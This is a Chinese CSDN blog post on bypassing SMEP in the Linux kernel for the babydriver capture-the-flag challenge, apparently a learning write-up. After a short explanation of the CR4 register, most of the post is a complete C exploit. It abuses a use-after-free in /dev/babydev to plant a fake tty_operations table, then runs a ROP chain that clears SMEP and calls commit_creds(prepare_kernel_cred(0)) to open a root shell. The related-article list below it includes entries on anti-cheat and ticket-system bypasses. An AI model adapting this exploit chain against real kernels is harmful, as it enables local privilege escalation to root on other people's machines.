kernel bypass smep

最新推荐文章于 2024-03-03 06:30:00 发布
最新推荐文章于 2024-03-03 06:30:00 发布
阅读量402 收藏
点赞数
分类专栏: # kernel 文章标签: 内核
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/121232138
版权

和之前的babydriver一样,用这个来解
semp开启以后,ret2usr就不能用了,因为semp让在ring0权的时候执行用户空间的代码直接crash掉
而系统开启semp的方法是设置cr4寄存器的第20位为1,第20位为0时关闭
在这里插入图片描述
gdb 如果不能看 cr4 寄存器的值,可以通过 报错查看。为了关闭 smep 保护,常用一个固定值 0x6f0,即 mov cr4, 0x6f0

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define prepare_kernel_cred_addr 0xffffffff810a1810
#define commit_creds_addr 0xffffffff810a1420

void* fake_tty_operations[30];

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}


void get_shell()
{
    system("/bin/sh");
}

void get_root()
{
    char* (*pkc)(int) = prepare_kernel_cred_addr;
    void (*cc)(char*) = commit_creds_addr;
    (*cc)((*pkc)(0));
}
int main()
{
    save_status();

    int i = 0;
    size_t rop[32] = {0};
    rop[i++] = 0xffffffff810d238d;      // pop rdi; ret;
    rop[i++] = 0x6f0;
    rop[i++] = 0xffffffff81004d80;      // mov cr4, rdi; pop rbp; ret;
    rop[i++] = 0;
    rop[i++] = (size_t)get_root;
    rop[i++] = 0xffffffff81063694;      // swapgs; pop rbp; ret;
    rop[i++] = 0;
    rop[i++] = 0xffffffff814e35ef;      // iretq; ret;
    rop[i++] = (size_t)get_shell;
    rop[i++] = user_cs;                /* saved CS */
    rop[i++] = user_rflags;            /* saved EFLAGS */
    rop[i++] = user_sp;
    rop[i++] = user_ss;

    for(int i = 0; i < 30; i++)
    {
        fake_tty_operations[i] = 0xFFFFFFFF8181BFC5; 
    }
    fake_tty_operations[0] = 0xffffffff810635f5;  //pop rax; pop rbp; ret;
    fake_tty_operations[1] = (size_t)rop;
    fake_tty_operations[3] = 0xFFFFFFFF8181BFC5;  // mov rsp,rax ; dec ebx ; ret

    int fd1 = open("/dev/babydev", O_RDWR);
    int fd2 = open("/dev/babydev", O_RDWR);
    ioctl(fd1, 0x10001, 0x2e0);
    close(fd1);

    int fd_tty = open("/dev/ptmx", O_RDWR|O_NOCTTY);
    size_t fake_tty_struct[4] = {0};
    read(fd2, fake_tty_struct, 32);
    fake_tty_struct[3] = (size_t)fake_tty_operations;
    write(fd2,fake_tty_struct, 32);

    char buf[0x8] = {0};
    write(fd_tty, buf, 8);

    return 0;
}
Akura@lan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SPDK - Kernel bypass for NVMe
yiyeguzhou100的专栏
10-19 445
The Storage Performance Development Kit (SPDK) provides a set of tools and libraries for writing high performance, scalable, user-mode storage applications. It achieves high performance through...
Kernel bypass技术及其在Ceph中的应用介绍
梦幻之巅
03-15 3563
##Kernel bypass技术及其在Ceph中的应用介绍 ###背景 Ceph是当前最流行的开源分布式统一存储,在一套基础架构中同时支持块存储、对象存储和文件存储,支持PB级别的扩展能力,广泛用于云环境中;Ceph来源于Sage Weil博士一项关于存储系统的PhD研究项目,最初被设计为一个分布式文件系统,整体架构基于低速设备而构建,提供毫秒(ms)级别的IO延迟。 从1956年第一块机械硬盘...
Linux性能优化(九)——Kernel Bypass
天山老妖
02-23 5523
一、Linux内核协议栈性能瓶颈 在x86体系结构中,接收数据包的传统方式是CPU中断方式,即网卡驱动接收到数据包后通过中断通知CPU处理,然后由CPU拷贝数据并交给内核协议栈。在数据量大时,CPU中断方式会产生大量 CPU中断,导致CPU负载较高。 (1)硬件中断导致的线程、进程切换 硬件中断请求会抢占优先级较低的软件中断,频繁到达的硬件中断和软中断意味着频繁的线程切换,随着而来的就是运行模式切换、上下文切换、线程调度器负载、高速缓存缺失(Cache Missing)、多核缓存共享数据同步.
kernel bypass 是什么?
迈达量化的博客
03-03 533
使用用户态网络协议栈:用户态网络协议栈是一种在用户空间实现网络协议栈的方法。它通过在用户空间中实现网络协议栈的功能,绕过内核,直接在用户空间中处理网络数据包。使用用户态驱动程序:用户态驱动程序是一种在用户空间中实现设备驱动程序的方法。它通过在用户空间中实现设备驱动程序的功能,绕过内核,直接在用户空间中访问和控制设备。这些方法都可以绕过内核,直接在用户空间中处理数据,从而提供更低的延迟和更高的性能。使用专用硬件:一些硬件设备提供了直接访问和控制设备内存的功能,可以绕过内核,直接在用户空间中处理数据。
bypass_bypass_
09-29
適用於近期之xccode之過渡偵測方式之檔案
12306Bypass.zip
04-02
标题中的“12306Bypass.zip”表明这是一个与12306网站相关的程序或工具,可能是为了绕过某些限制或者优化购票体验而设计的。12306是中国铁路客户服务中心的官方网站,主要用于火车票的查询、预订和购买。在节假日或...
Bypass抢票应用程序
最新发布
03-18
标题中的“Bypass抢票应用程序”指的是一个可能用于绕过常规购票系统限制的软件工具,这类工具在春节期间或热门活动时特别受欢迎,因为它们能够帮助用户自动监控和快速购买稀缺的票务资源。抢票应用通常利用自动化...
sqli-bypass靶场
11-10
"sqli-bypass靶场"显然是一个专门用于测试和学习SQL注入漏洞绕过技术的平台。在这个靶场中,你可能会遇到各种防御机制,如输入过滤、参数化查询、存储过程等,而你需要学习如何在这些防御下找到漏洞并实施有效的SQL...
WAF的正确bypass
10-20
**WAF的正确bypass** 是指在遇到Web应用程序防火墙(Web Application Firewall)时,通过巧妙的方法绕过其安全防护机制,实现有效测试或安全验证。WAFs设计用于保护网站免受SQL注入、跨站脚本攻击(XSS)、CSRF等...
APEX-EACBypass:APEX-EACBypass(用户模式)
03-17
APEX-EAC绕过 用法: 编译出来重命名为“ EasyAntiCheat_launcher.exe”替换到游戏目录下,用橘子平台启动游戏 关于心跳 写个空的dll命名为“ EasyAntiCheat_x64.dll”替换到游戏目录下用你自己的方式加载到游戏里如果以后加强了怎么办?下,应该是断在检测到EAC未运行那个画面,执行到用户代码,发现是“ binkawin64.dll”这个模块的线程,然后,看是程序哪里起的这个线程,一层回溯上去。办法:柿子挑软的捏,那些同时使用UE和EAC的游戏,大部分裤子都被扒干净了,找到他们的SDK,其中引用EAC SDK的部分,看一看EAC的SDK整体的结构是怎么样的,大概有什么函数,dump下进程来看看反汇编的样子,然后可以在APEX里面找找看。不过这个游戏是起源改,不久后难逃被扒光的命运,毕竟起源引擎“约等于巧”办法2:游戏没加壳,拿起他的EAC键就跑
Kernel pwn 基础教程之 ret2usr 与 bypass_smep
蚁景网安学院
03-16 462
一、前言 在我们的pwn学习过程中,能够很明显的感觉到开发人员们为了阻止某些利用手段而增加的保护机制,往往这些保护机制又会引发出新的bypass技巧,像是我们非常熟悉的Shellcode与...
如何实现内核旁路(Kernel bypass)?
热门推荐
IT小小鸟~~
12-02 1万+
原文链接 感谢原文作者 Marek Majkowski 感谢伯乐在线 至秦 前辈校稿 感谢伯乐在线 黄利民 前辈推荐本文在前两篇文章中,我们讨论了如何每秒接收 1M UDP 数据包 以及 如何减少往返时间 。我们在 Linux 上做试验,因为它是一个性能非常好的通用操作系统。不幸的是,对于一些更加专业的工作,Vanilla Linux(译者注:Linux 的内核版本,代号“香草”) 内核的网
linux kernel pwn学习之堆漏洞利用+bypass smap、smep
seaaseesa的博客
03-01 4995
Linux kernel Heap exploit Linux内核使用的是slab/slub分配器,与glibc下的ptmalloc有许多类似的地方。比如kfree后,原来的用户数据区的前8字节会有指向下一个空闲块的指针。如果用户请求的大小在空闲的堆块里有满足要求的,则直接取出。 通过调试,可以发现,被释放的堆的数据域前8字节正好指向下一个空闲堆的数据域 与glibc下的ptmalloc...
Linux Kernel Exploit 内核漏洞学习(3)-Bypass-Smep
钞sir的博客
08-09 1万+
简介 smep的全称是Supervisor Mode Execution Protection,它是内核的一种保护机制,作用是当CPU处于ring0模式的时候,如果执行了用户空间的代码就会触发页错误,很明现这个保护机制就是为了防止ret2usr攻击的… 这里为了演示如何绕过这个保护机制,我仍然使用的是CISCN2017 babydriver,这道题基本分析和利用UAF的方法原理我已经在kernel...
怎么绕过短息验证_Windows 10 x64上令牌窃取有效载荷问题,并绕过SMEP(下)
weixin_32491317的博客
01-05 309
Windows 10 x64上令牌窃取有效载荷问题,并绕过SMEP(上) SMEP什么是SMEPSMEP或Supervisor模式执行保护是最早在Windows 8(在Windows上下文中)中实现的保护。当我们谈论为内核漏洞利用执行代码时,最常见的技术是在用户模式下分配shellcode并从内核调用它。这意味着将在内核上下文中调用用户模式代码,从而为我们提供获得系统特权的适用权限。...
Protection 6 ---- Page-Level Protection
activesys的专栏
12-05 1207
页级别的保护类型 #PF异常 例子 参考
Kernel Bypass & DPDK
weixin_44260459的博客
10-23 2335
1、Kernel Bypass简介 kernel bypassing是用来做low latency 中的一项常见解决方案,往往在高速科学计算、低延迟交易设备常中用到。 Kernel Bypass内核旁路)是一种绕过Linux内核(TCPIP协议栈)的技术,不使用Linux内核子系统的功能,采用自己实现的相同功能的代码来处理,从用户空间直接访问和控制设备内存,避免数据从设备拷贝到内核,再从内核拷贝到用户空间。 Kernel Bypass目前主流实现方案如DPDK、SolarFlare。 2、Kerne
bypass和非bypass区别
05-18
Bypass和非Bypass是指计算机网络中的两种不同路由方式。 Bypass是一种路由方式,也称为直通式路由。当网络设备(如防火墙、负载均衡器等)出现故障或维护时,通过Bypass可以让网络流量直接绕过这些设备,而不会造成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值